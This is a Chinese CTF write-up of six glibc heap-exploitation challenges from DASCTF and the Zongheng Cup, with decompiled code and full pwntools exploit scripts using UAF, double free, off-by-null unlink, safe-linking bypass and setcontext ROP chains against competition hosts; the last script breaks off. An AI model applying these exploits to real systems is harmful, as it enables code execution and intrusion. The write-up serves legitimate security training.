2021-DASCTF-纵横杯线下

字数统计: 4.7k字   |   阅读时长≈ 24分

记录一下近期打的几场比赛,有意思的题会多讲讲。

MAR-DASCTF

fruitepie

程序分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
int __cdecl main(int argc, const char **argv, const char **envp)
{
  _DWORD size[3]; // [rsp+4h] [rbp-1Ch] BYREF
  char *v5; // [rsp+10h] [rbp-10h]
  unsigned __int64 v6; // [rsp+18h] [rbp-8h]

  v6 = __readfsqword(0x28u);
  init();
  welcome();
  puts("Enter the size to malloc:");
  size[0] = readInt();
  v5 = (char *)malloc(size[0]);
  if ( !v5 )
  {
    puts("Malloc Error");
    exit(0);
  }
  printf("%p\n", v5);
  puts("Offset:");
  _isoc99_scanf("%llx", &size[1]);
  puts("Data:");
  read(0, &v5[*(_QWORD *)&size[1]], 0x10uLL);
  malloc(0xA0uLL);
  close(1);
  return 0;
}

题目十分短,所以需要猜测是不是有什么特殊套路。

这里的套路就是,当 malloc(-1)时,会申请一个巨大的堆块。然而初始的 heap大小不够,所以会调用 mmap分配堆块,而此时新的堆块地址就十分靠近 libc地址,且和 libc基址的偏移是固定的。那么我们输出该Heap的地址,就可以得到 libc地址。最后覆盖 malloc_hook即可。

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
from pwn import *
context.update(arch='amd64', os='linux', log_level='debug')
context.terminal=(['tmux','split','-h'])
filename = './fruitpie'
libcname = '/lib/x86_64-linux-gnu/libc.so.6'
debug = 0
if debug == 1:
    p = process(filename)
    elf = ELF(filename)
    libc = ELF(libcname)
else:
    p = remote('54f57bff-61b7-47cf-a0ff-f23c4dc7756a.machine.dasctf.com', 50202)
    libc = ELF('./libc.so.6')

one_gadget = [0x4f365, 0x4f3c2, 0x10a45c]

def Pwn():
    #gdb.attach(p, 'bp $rebase(0xc28)')
    size = -1
    p.sendlineafter('size to malloc:\n', str(size))

    libc_addr = int(p.recvuntil('\n', drop=True), 16)
    print("libc_addr:",hex(libc_addr))

    libc_base = libc_addr + 0x100000ff0
    print('libc_base:',hex(libc_base))

    gadget = one_gadget[2] + libc_base

    malloc_hook = libc_base + libc.sym['__malloc_hook']
    print('malloc_hook:',hex(malloc_hook))

    offset = malloc_hook-libc_addr
    p.sendlineafter('Offset:\n', str(hex(offset)))


    payload = p64(gadget)
    p.sendafter('Data:\n', payload)


    p.interactive()

Pwn()

ParentSimulator

程序分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
int Remove()
{
  __int64 v0; // rax
  int v2; // [rsp+Ch] [rbp-4h]

  puts("Please input index?");
  LODWORD(v0) = get_opt();
  v2 = v0;
  if ( (int)v0 >= 0 && (int)v0 <= 9 )
  {
    v0 = child_list[(int)v0];
    if ( v0 )
    {
      free((void *)child_list[v2]);
      chunk_flag[v2] = 0;
      LODWORD(v0) = puts("Done");
    }
  }
  return v0;
}

Delete函数,存在 UAF漏洞。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
int backdoor()
{
  char *v0; // rax
  int v2; // [rsp+8h] [rbp-8h]
  int v3; // [rsp+Ch] [rbp-4h]

  printf("You only have 1 chances to change your child's gender, left: %d\n", (unsigned int)bakflag);
  LODWORD(v0) = bakflag;
  if ( bakflag )
  {
    puts("Please input index?");
    LODWORD(v0) = get_opt();
    v2 = (int)v0;
    if ( (int)v0 >= 0 && (int)v0 <= 9 )
    {
      v0 = (char *)child_list[(int)v0];
      if ( v0 )
      {
        --bakflag;
        printf("Current gender:%s\n", (const char *)(child_list[v2] + 8LL));
        puts("Please rechoose your child's gender.\n1.Boy\n2.Girl:");
        v3 = get_opt();
        if ( v3 == 1 )
        {
          v0 = (char *)(child_list[v2] + 8LL);
          *(_DWORD *)v0 = 0x796F62;
        }
        else if ( v3 == 2 )
        {
          v0 = (char *)(child_list[v2] + 8LL);
          strcpy(v0, "girl");
        }
        else
        {
          LODWORD(v0) = puts("oho, you choose a invalid gender.");
        }
      }
    }
  }
  return (int)v0;
}

有一个后门,可以用来修改 chunk+8处的值。

基于 2.31版本。

利用分析

2.31版本的double free,那么就需要修改 freed chunk +8 处的 key值即可实现 double free。而这里的后门就是用来修改该 Key值的。

利用 UAF,来泄露 libc地址。利用 double free来劫持 free_hook

利用 setcontext+61来执行 orw.

注意:唯一比较坑的地方就是,程序一开始修改了当前工作路径为根目录,所以本地测试的时候一直读不到当前路劲下的flag,又调试了很久(但幸运拿了一血)。

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
from pwn import *
context.update(arch='amd64', os='linux', log_level='debug')
context.terminal=(['tmux','split','-h'])
filename = './pwn'
libcname = '/lib/x86_64-linux-gnu/libc.so.6'
debug = 0
if debug == 1:
    p = process([filename], env={"LD_PRELOAD": "./libc-2.31.so"})
    elf = ELF(filename)
    #libc = ELF(libcname)
    libc = ELF('./libc-2.31.so')
else:
    p = remote('pwn.machine.dasctf.com', 51603)
    libc = ELF('./libc-2.31.so')
    elf = ELF(filename)

def Add(idx, ch, name):
    p.sendlineafter('>> ',str(1))
    #sleep(0.1)
    p.sendlineafter('Please input index?\n', str(idx))
    #sleep(0.1)
    p.sendlineafter('gender.\n1.Boy\n2.Girl:\n', str(ch))
    p.sendafter('s name:\n', name)

def Edit(idx, name):
    p.sendlineafter('>> ',str(2))
    p.sendlineafter('Please input index?\n', str(idx))
    p.sendlineafter('new name:\n', name)

def Show(idx):
    p.sendlineafter('>> ',str(3))
    p.sendlineafter('Please input index?\n', str(idx))

def Delete(idx):
    p.sendlineafter('>> ',str(4))
    p.sendlineafter('Please input index?\n', str(idx))

def Edit2(idx,payload):
    p.sendlineafter('>> ',str(5))
    p.sendlineafter('Please input index?\n', str(idx))
    p.sendlineafter('description:\n',payload)

def back(idx, ch):
    p.sendlineafter('>> ',str(666))
    p.sendlineafter('Please input index?\n', str(idx))
    p.sendlineafter('2.Girl:\n', str(ch))

def magic_frame(rdx_rdi, secontext_addr, rdi, rsi, rdx, rsp, rip):
    payload = p64(rdx_rdi) + p64(0) * 2  #rdx
    payload += p64(secontext_addr)             #call func_addr
    payload = payload.ljust(0x60, b'\x00')
    payload += p64(rdi) + p64(rsi)  # rdi , rsi
    payload += p64(0) * 2 + p64(rdx) + p64(0x18) + p64(0)  # rdx
    payload += p64(rsp) + p64(rip)  # rsp, rip
    payload = payload.ljust(0xf8, b'\x00')
    return payload

def Pwn():
    payload = 'a'*7
    Add(0, 1, payload)
    Add(1, 1, payload)
    Delete(0)

    #double free
    back(0, 1)
    Delete(0)
    #chunk 0
    Add(0, 1, payload)
    Add(2, 1, payload)

    for i in range(3, 9):
        Add(i, 1, payload)

    for i in range(9, 2, -1):
        Delete(i)
    Delete(1)

    print('into unsortedbin')
    #into unsortedbin
    Delete(0)

    Show(2)
    p.recvuntil('Name: ')
    libc_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - 0x10- 96-libc.sym['__malloc_hook']
    print('libc_addr:',hex(libc_addr))
    free_hook = libc_addr + libc.sym['__free_hook']
    pop_rax = 0x4a550 + libc_addr
    pop_rdi = 0x26b72+ libc_addr
    pop_rsi = 0x27529 + libc_addr
    pop_rdx_r12 = 0x11c1e1+libc_addr
    ret = 0x25679 + libc_addr

    setcontext = libc_addr + libc.sym['setcontext']
    open_addr = libc_addr+libc.sym['open']
    read_addr = libc_addr + libc.sym['read']
    write_addr = libc_addr+libc.sym['write']
    flag_str_addr = free_hook + 0x220+4
    flag_addr = free_hook + 0x300
    syscall = 0x66229 + libc_addr

    orw = flat([
        pop_rdi, flag_str_addr,
        pop_rsi, 0,
        #pop_rdx_r12, 2,
        open_addr,
        #pop_rax, 2,
        #syscall,
        pop_rdi, 4,
        pop_rsi, flag_addr,
        pop_rdx_r12, 0x50, 0,
        read_addr,
        pop_rdi, 1,
        pop_rsi, flag_addr,
        pop_rdx_r12, 0x30, 0,
        write_addr
    ])

    payload = 'a'*7
    Add(1, 1, payload)  #chunk1
    for i in range(3, 9):
        Add(i, 2, payload)

    print("hajack free_hook")
    Add(0, 1, payload)  #chunk0
    Delete(3)
    Delete(0)

    payload = p64(free_hook-0x10)
    Edit(2, payload[:6])

    Add(0, 1, 'a'*7)    #chunk0
    Add(3, 1, 'a'*7)  #free_hook

    Delete(4)
    Delete(0)
    payload = p64(free_hook+0xe0)
    Edit(2, payload[:6])
    Add(0, 1, 'a'*7)    #chunk0
    Add(4, 1, 'a'*7)    #free-0xf0

    Delete(5)
    Delete(0)
    payload = p64(free_hook+0x1d0)
    Edit(2, payload[:6])
    Add(0, 1, 'a'*7)    #chunk0
    Add(5, 1, 'a'*7)    #free-0x1e0

    print("attack begin3")

    Delete(6)
    Delete(0)
    payload = p64(free_hook)
    Edit(2, payload[:6])
    Add(0, 1, 'a'*7)    #chunk0
    payload = p64(free_hook)
    Add(6, 1, payload[:6])    #free-0x1e0

    print("attack begin")

    magic_addr = libc_addr + 0x1547a0
    orw_addr = free_hook+0x122
    frame_addr = free_hook
    payload = p64(magic_addr)
    payload += magic_frame(frame_addr, setcontext + 61, 0, 0, 0, orw_addr, ret)
    payload = payload.ljust(0x120, b'\x00') + orw
    payload = payload.ljust(0x220, b'\x00') + './flag\x00'

    payload1 = payload[:0xee]
    payload2 = payload[0xee:0x1dc]
    payload3 = payload[0x1dc:]
    print("magic:",hex(magic_addr))
    print("ste:",hex(setcontext+61))
    print(payload)
    #gdb.attach(p, 'bp $rebase(0x1c0b)')
    Edit2(5, payload3)
    Edit2(4, payload2)
    Edit2(3, payload1)

    Delete(6)


    p.interactive()

Pwn()

clown

程序分析

程序总体功能是一个比较常见的菜单题,实现了Add\Delete\Show功能。其中能申请的堆块数量为 0x100,也就导致这道题方法还挺灵活的。并且开启了沙箱,那么我们就只能使用 orw来获取 flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
int sub_BD5()
{
  int result; // eax
  unsigned int v1; // [rsp+Ch] [rbp-4h]

  puts("Index: ");
  v1 = get_opt();
  if ( v1 <= 0xFF && *((_QWORD *)&chunk_list + v1) )
  {
    free(*((void **)&chunk_list + v1));
    result = puts("Done");
  }
  else
  {
    puts("Error");
    result = 1;
  }
  return result;
}

利用分析

程序漏洞存在于 delete函数中,有一个 UAF漏洞。libc版本为 2.32

首先我们需要泄漏地址。由于有一个 UAF漏洞,那么泄露地址就十分简单。可以直接申请 大于 0x80的堆块填充满 tcache后,再释放一个到 unsortedbin来泄露地址。以此得到libc地址

此外,我们还需要知道堆地址,原因是由于glibc-2.32新增了一种safe-linking机制,该机制用于对单链表tcache以及fastbinfd指针进行加密,从而增强安全性,加密的规则为将fd指针与右移3个字节的堆基地址进行异或操作

1
2
3
#define PROTECT_PTR(pos, ptr) \  
  ((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))  
#define REVEAL_PTR(ptr)  PROTECT_PTR (&ptr, ptr)

所以,如果后面想通过劫持tcache实现任意地址堆块分配,需要知道堆地址,来对我们任意地址进行加密。

这里想要泄露heap地址,可以输出tcache中的第一个堆块,由于该堆块的next指针指向 tcache_perthread_struct结构体,所以加密后也就是 tcache_perthread_struct>>12,我们很容易得到堆块地址

之后便是劫持tcache,劫持tcache的最好思路是利用 uaf漏洞将tcache中的空闲堆块的next指针改为我们想分配的地址。但是这里没有 edit功能。所以选择利用堆合并后,申请大堆块,来实现堆重叠。

先分别释放 0x90 chunk10xf0 chunk2的堆块到 unsortedbin中造成堆合并,然后再将 chunk2放入tcache中 。然后申请一个0x100 chunk3的堆块,此时 chunk3就和 chunk2发生重叠。利用chunk3修改 chunk2next指针指向 free_hook

最后便是orw

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
from pwn import *
context.update(arch='amd64', os='linux', log_level='debug')
context.terminal=(['tmux','split','-h'])
filename = './clown'
libcname = '/lib/x86_64-linux-gnu/libc.so.6'
debug = 0
if debug == 1:
    #p = process([filename], env={"LD_PRELOAD": "./libc-2.31.so"})
    p = process(filename)
    elf = ELF(filename)
    libc = ELF(libcname)
    #libc = ELF('./libc-2.31.so')
else:
    p = remote('pwn.machine.dasctf.com', 50801)
    libc = ELF('./libc.so.6')
    elf = ELF(filename)

def Add(size, payload):
    p.sendlineafter('>> ', str(1))
    p.sendlineafter('Size: \n',str(size))
    p.sendafter('Content: ', payload)

def Delete(idx):
    p.sendlineafter('>> ', str(2))
    p.sendlineafter('Index: \n',str(idx))

def Show(idx):
    p.sendlineafter('>> ', str(3))
    p.sendlineafter('Index: \n',str(idx))

def magic_frame(rdx_rdi, secontext_addr, rdi, rsi, rdx, rsp, rip):
    payload = p64(rdx_rdi) + p64(0) * 2  #rdx
    payload += p64(secontext_addr)             #call func_addr
    payload = payload.ljust(0x60, b'\x00')
    payload += p64(rdi) + p64(rsi)  # rdi , rsi
    payload += p64(0) * 2 + p64(rdx) + p64(0x18) + p64(0)  # rdx
    payload += p64(rsp) + p64(rip)  # rsp, rip
    payload = payload.ljust(0xf8, b'\x00')
    return payload

def enc(addr1, addr2):
    addr = (addr1>>12)^addr2
    return addr

def Pwn():
    for i in range(8):
        Add(0x90, 'a'*8)

    Add(0xf0, 'a'*8)    #8
    Add(0xa0, 'a'*8)    #9
    #Add(0xf0, 'a'*8)

    for i in range(7):
        Add(0xf0, 'a'*8)    #10-16

    Delete(0)
    Show(0)
    heap_addr = (u64(p.recv(5).ljust(8, b'\x00'))<<12)
    print('heap_addr:',hex(heap_addr))

    for i in range(1, 8):
        Delete(i)

    Add(0x100, 'a'*8)    #17

    Show(7)
    libc_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))-0x10-240-libc.sym['__malloc_hook']
    print('libc_addr:',hex(libc_addr))
    free_hook = libc_addr+libc.sym['__free_hook']
    system = libc_addr+libc.sym['system']
    print("free_hook:",hex(free_hook))

    print('chunk consolidate:')
    for i in range(7):
        Delete(10+i)
    Delete(8)

    for i in range(7):  #18-24
        Add(0xf0, 'a'*8)

    print("double free")
    Delete(20)
    Delete(8)

    #gdb.attach(p, 'bp $rebase(0xf32)')
    print("hajack free_hook")
    a1 = enc(heap_addr+0x7a0, free_hook)
    print("addr:",hex(a1))
    payload = 'a'*0x90+p64(0)+p64(0x91)+p64(a1)
    Add(0x100, payload)  #25
    Add(0xf0, 'a'*8)   #26

    for i in range(8):
        Add(0x80, '2'*8)    #27-34

    for i in range(8):      #35-42
        Add(0xe0, '3'*8)

    for i in range(8):
        Delete(27+i)
    for i in range(7):
        Delete(36+i)

    print("chunk consolidate 2")
    Delete(35)

    for i in range(7):  #43-49
        Add(0xe0, '2'*8)
    print("tcahe hajack2")
    Delete(45)
    Delete(35)

    #gdb.attach(p, 'bp $rebase(0xf32)')
    a1 = enc(heap_addr+0x1550, free_hook+0xe0)
    print("addr:",hex(a1))
    payload = 'a'*0x80+p64(0)+p64(0xf1)+p64(a1)
    Add(0x100, payload)  #50
    Add(0xe0, 'a'*8)   #51

    for i in range(8):  #52-59
        Add(0xb0, '2'*8)
    for i in range(8):  #60-67
        Add(0xd0, '3'*8)
    for i in range(8):
        Delete(52+i)
    for i in range(7):
        Delete(61+i)
    print("chunk consolidate 3")
    Delete(60)

    for i in range(7):  #68-74
        Add(0xd0, '2'*8)
    print("tcahe hajack3")
    Delete(70)
    Delete(60)

    #gdb.attach(p, 'bp $rebase(0xf32)')
    a1 = enc(heap_addr+0x22d0, free_hook+0x1c0)
    print("addr:",hex(a1))
    payload = 'a'*0xb0+p64(0)+p64(0xf1)+p64(a1)
    Add(0x100, payload)  #75
    Add(0xd0, 'a'*8)   #76

    p_rdi_r = 0x277d6+libc_addr
    p_rsi_r = 0x32032 + libc_addr
    p_rdx_r = 0xc800d + libc_addr
    p_rax_r = 0x45580 + libc_addr
    syscall = 0x611ea+libc_addr
    ret = 0xbcc1b + libc_addr

    flag_str_addr = free_hook + 0x210
    flag_addr = free_hook + 0x300
    open_addr = libc_addr+libc.sym['open']
    read_addr = libc_addr + libc.sym['read']
    write_addr = libc_addr+libc.sym['write']
    orw = flat([
        p_rdi_r, flag_str_addr,
        p_rsi_r, 0,
        open_addr,
        p_rdi_r, 3,
        p_rsi_r, flag_addr,
        p_rdx_r, 0x40,
        read_addr,
        p_rdi_r, 1,
        p_rsi_r, flag_addr,
        p_rdx_r, 0x40, 0,
        write_addr
    ])

    setcontext = libc_addr + libc.sym['setcontext']
    magic_addr = libc_addr + 0x14b760
    orw_addr = free_hook+0x110
    frame_addr = free_hook
    payload = p64(magic_addr)
    payload += magic_frame(frame_addr, setcontext + 61, 0, 0, 0, orw_addr, ret)
    payload = payload.ljust(0x110, b'\x00') + orw
    payload = payload.ljust(0x220, b'\x00') + './flag\x00'

    print('magic:',hex(magic_addr))

    p1 = payload[:0xe0]
    p2 = payload[0xe0:0x1d0]
    p3 = payload[0x1d0:]
    #gdb.attach(p, 'bp $rebase(0xf32)')
    Add(0xd0, p3)
    Add(0xe0, p2)
    Add(0xf0, p1)

    Delete(79)

    p.interactive()

Pwn(

babyheap

最后一小时放了道题,差一点做完,有点可惜。

程序分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
int Edit()
{
  int result; // eax
  int v1; // [rsp+Ch] [rbp-4h]

  puts("index?");
  result = dword_404078;
  if ( dword_404078 )
  {
    --dword_404078;
    result = get_opt();
    v1 = result;
    if ( result >= 0 && result <= 31 )
    {
      result = size_list[result];
      if ( result )
      {
        puts("content?");
        result = get_input((void *)chunk_list[v1], size_list[v1]);
      }
    }
  }
  return result;
}

2.31off-by-null漏洞。一般想到 off-by-null就是需要利用堆块合并,造成堆重叠来解决。

利用分析

但是 自从 2.29unlink就加了一个检测:

1
2
3
if (__glibc_unlikely (chunksize(p) != prevsize))
  malloc_printerr ("corrupted size vs. prev_size while consolidating");
unlink_chunk (av, p);

首先就是检查了 当前堆块的 prevsize和前一个以释放堆块的 size是否相同,如果不相同直接报错。

1
2
if (__builtin_expect (FD->bk != P || BK->fd != P, 0))              \
      malloc_printerr (check_action, "corrupted double-linked list", P, AV);  \

以及对 fdbk指针的检查。

我们之前的 off-by-null利用中,只需要伪造 fake-prevsize和 当前堆块的 inuse位即可。但是 2.29之后,我们不仅要在当前要释放堆块中伪造这两个数据。

还需要在上一块中 伪造 fake_sizefd以及 bk指针。

这里 fake_size我们直接在数据区伪造即可,fdbk则是因为这道题没有开启 PIE,且有 chunk_list。我们伪造如下布局:

1
2
3
4
5
6
7
8
chunk1:				|			|	 0x101		|
chunk1_user_data:	|			|    0x1f1		|
					|  fake_fd	|	fake_bk		|
					|		  ...		     	|
chunk2				|			|	0x101		|
					|		  ...				|
chunk3				|	0x1f0	|	0x100		|
					|		  ...				|

chunk1的数据区伪造 fake_size,和 fake_fdfake_bkchunk1chunk_list中的地址为 chunk1_ptr,则 fake_fdfake_bk的地址分别为 chunk1_ptr-0x18chunk1_ptr-0x10。那么即可满足对 这两个指针的检查:

1
2
*((chunk1_ptr-0x18)+0x18)=*(chunk1_ptr)=chunk1_addr
*((chunk1_ptr-x10)+0x10)=*(chunk_ptr)=chunk1_addr

然后将 0x100tcache填满,然后释放 chunk3即会在进入 unsortedbin中时,构成堆合并。

在申请 0x1f0的堆块 chunk4,即可实现对 chunk2的重叠。

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
from pwn import *
context.update(arch='amd64', os='linux', log_level='debug')
context.terminal=(['tmux','split','-h'])
filename = './pwn'
libcname = '/lib/x86_64-linux-gnu/libc.so.6'
debug = 1
if debug == 1:
    p = process(filename)
    elf = ELF(filename)
    libc = ELF(libcname)
else:
    p = remote('pwn.machine.dasctf.com', 50801)
    libc = ELF('./libc-2.31.so')
    elf = ELF(filename)

def Add(idx, size, payload):
    p.sendlineafter('>> ',str(1))
    p.sendlineafter('index?\n',str(idx))
    p.sendlineafter('size?\n',str(size))
    p.sendafter('content?', payload)

def Delete(idx):
    p.sendlineafter('>> ',str(3))
    p.sendlineafter('index?\n',str(idx))

def Show(idx):
    p.sendlineafter('>> ',str(2))
    p.sendlineafter('index?\n',str(idx))

def Edit(idx, payload):
    p.sendlineafter('>> ',str(4))
    p.sendafter('Sure to exit?(y/n)\n',str('n'))
    p.sendlineafter('index?\n',str(idx))
    p.sendafter('content?\n',payload)

def Pwn():
    p.recvuntil('gift: ')
    puts_addr = int(p.recvuntil('\n', drop=True), 16)
    libc.address = puts_addr - libc.sym['puts']
    print("libc_base:",hex(libc.address))

    free_hook = libc.sym['__free_hook']
    system_addr = libc.sym['system']

    for i in range(7):
        Add(i, 0xf0, 'a')

    ptr = 0x404178
    payload = p64(0)+p64(0x1f1)+p64(ptr-0x18)+p64(ptr-0x10)
    Add(7, 0xf0, payload)
    payload = 'a'*0xf0
    Add(8, 0xf8, payload)
    payload = (p64(0x20)+p64(0x21))*15
    Add(9, 0xf0, payload)
    Add(10, 0xf0, '10')

    payload = 'a'*0xf0+p64(0x1f0)
    Edit(8, payload)

    for i in range(7):
        Delete(i)
    gdb.attach(p, 'bp 0x401714')
    #chunk consolidate
    Delete(9)

    for i in range(5):
        Add(10+i, 0xf0, '/bin/sh\x00')

    Delete(8)

    payload = 'a'*0xe0+p64(0)+p64(0x101)+p64(free_hook)
    Add(15, 0x1f0, payload)

    Add(16, 0xf0, p64(system_addr))
    Add(17, 0xf0, p64(system_addr))

    Delete(11)
    p.interactive()

Pwn()

纵横杯线下

Pwn2

程序分析

IDA分析发现十分复杂,而且不像我们常见的 CC++等反编译的结构。后面可以在strings中发现如下字符:

1
2
3
4
5
6
7
8
9
10
11
12
.rodata:0000000000006687	00000011	C	PyModule_GetDict
.rodata:0000000000006698	00000016	C	PyObject_CallFunction
.rodata:00000000000066AE	0000001D	C	PyObject_CallFunctionObjArgs
.rodata:00000000000066CB	00000017	C	PyObject_SetAttrString
.rodata:00000000000066E2	00000017	C	PyObject_GetAttrString
.rodata:00000000000066F9	0000000D	C	PyObject_Str
.rodata:0000000000006706	00000013	C	PyRun_SimpleString
.rodata:0000000000006719	00000014	C	PySys_AddWarnOption
.rodata:000000000000672D	00000010	C	PySys_SetArgvEx
.rodata:000000000000673D	00000010	C	PySys_GetObject
.rodata:000000000000674D	00000010	C	PySys_SetObject
.rodata:000000000000675D	0000000E	C	PySys_SetPath

可以看到,带有大量 Py字符。所以怀疑是一个 python脚本通过 pyinstaller打包成的 ELF文件。

利用分析

那么就只需要按照这篇文章的方法,将这个 ELF文件解包反编译为 python脚本即可。

还原出的脚本,关键部分如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
def send_head(self):
    path = self.translate_path(self.path)
    f = None
    if 'flag' in self.path:
        self.send_error(403, self.responses[403][0])
        return
    if os.path.isdir(path):
        parts = urlparse.urlsplit(self.path)
        if not parts.path.endswith('/'):
            self.send_response(301)
            new_parts = (parts[0], parts[1], parts[2] + '/',
             parts[3], parts[4])
            new_url = urlparse.urlunsplit(new_parts)
            self.send_header('Location', new_url)
            self.end_headers()
            return
        for index in ('index.html', 'index.htm'):
            index = os.path.join(path, index)
            if os.path.exists(index):
                path = index
                break
        else:
            self.send_error(403, self.responses[403][0])
            return

    ctype = self.guess_type(path)
    try:
        f = open(path, 'r')
    except IOError:
        self.send_error(404, 'File not found')
        return

    try:
        self.send_response(200)
        self.send_header('Content-type', ctype)
        fs = os.fstat(f.fileno())
        self.send_header('Content-Length', str(fs[6]))
        self.send_header('Last-Modified', self.date_time_string(fs.st_mtime))
        self.end_headers()
        return f
    except:
        f.close()
        raise

python基本实现了一个 httpd,而且有读文件,虽然过滤了 flag字符。但是可以想办法绕过。那么这里就是直接构造 Get数据包,然后绕过读取 flag即可。发现直接使用 ASCLL码即可绕过,读取出 flag

Pwn3

这里后面LYYL和我说,远程是 2.27新版本,加了tcache保护的,所以这个exp还得改改

程序分析

一个 C++题目。总体实现了 CreateDeleteView函数。而且是用 Vector实现。此外,还有三个不太常见的函数 Clone\get\set

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
int __cdecl main(int argc, const char **argv, const char **envp)
{
  int choice; // [rsp+Ch] [rbp-34h] BYREF
  std::vector<std::shared_ptr<Drawf>> list; // [rsp+10h] [rbp-30h] BYREF
  unsigned __int64 v6; // [rsp+28h] [rbp-18h]

  v6 = __readfsqword(0x28u);
  init();
  std::vector<std::shared_ptr<Drawf>>::vector(&list);
  while ( 1 )
  {
    std::operator<<<std::char_traits<char>>(&std::cout, "Choice: ");
    std::istream::operator>>(&std::cin, &choice);
    switch ( choice )
    {
      case 1:
        Create(&list);
        break;
      case 2:
        Get(&list);
        break;
      case 3:
        Delete(&list);
        break;
      case 4:
        Clone(&list);
        break;
      case 5:
        Set(&list);
        break;
      case 6:
        View(&list);
        break;
      default:
        puts("Invalid.");
        break;
    }
  }
}

测试发现,Clone会把选择的堆块地址,复制一次放入堆块链表的末尾。也就是此时,堆块链表中有两个相同的堆块。那么就存在一个 double freeUAF漏洞。

Getset函数中,都会执行堆结构体前8字节的指针。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
void __cdecl Get(std::vector<std::shared_ptr<Drawf>> *list)
{
  std::__shared_ptr_access<Drawf,(__gnu_cxx::_Lock_policy)2,false,false>::element_type *v1; // rax
  dwarf_t tmp; // [rsp+10h] [rbp-30h] BYREF
  unsigned __int64 v3; // [rsp+28h] [rbp-18h]

  v3 = __readfsqword(0x28u);
  get_dwarf((std::vector<std::shared_ptr<Drawf>> *)&tmp);
  if ( std::__shared_ptr<Drawf,(__gnu_cxx::_Lock_policy)2>::operator bool(&tmp) )
  {
    v1 = std::__shared_ptr_access<Drawf,(__gnu_cxx::_Lock_policy)2,false,false>::operator->((const std::__shared_ptr_access<Drawf,(__gnu_cxx::_Lock_policy)2,false,false> *const)&tmp);
    (*v1->_vptr_Drawf)(v1, list);		//执行指针
  }
  else
  {
    puts("Oops");
  }
  std::shared_ptr<Drawf>::~shared_ptr(&tmp);
}

利用分析

题目基于 2.27,可以先利用 UAF漏洞 泄露出 Libc地址。

随后,利用 double free漏洞,输入与其堆块管理结构体大小相同的数据,以此来实现覆盖堆结构体。例如,此时double free如下:

1
0xf0: chunk1->chunk1

那么,再次申请 0xf0的堆结构,并且输入 0xe0的数据。那么系统会先分配 chunk1为堆结构体,再分配 0xf0用来存储数据。而用来存储数据的堆块,就可以覆盖堆结构体的指针。

最后通过,get函数,会执行堆结构体的指针来执行 one_gadget

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
from pwn import *
context.update(arch='amd64', os='linux', log_level='debug')
context.terminal=(['tmux','split','-h'])
filename = './pwn3'
libcname = '/lib/x86_64-linux-gnu/libc.so.6'
debug = 1
if debug == 1:
    p = process(filename)
    elf = ELF(filename)
    libc = ELF(libcname)
else:
    p = remote()
    elf = ELF(filename)

types = ['pYwVfF','stlHxv','wMPWXa','pJEJQH','qzPSDm','PCVqej','uxPyxf','qOwyJp','wgxzEb','ynvaul']

def New(type, name):
    p.sendlineafter('Choice: ', str(1))
    p.sendlineafter('Which type? ', str(type))
    p.sendlineafter('name: ', name)

def Get(name):
    p.sendlineafter('Choice: ', str(2))
    p.sendlineafter('name? ', name)

def Delete(name):
    p.sendlineafter('Choice: ', str(3))
    p.sendlineafter('name? ', name)

def Clone(name):
    p.sendlineafter('Choice: ', str(4))
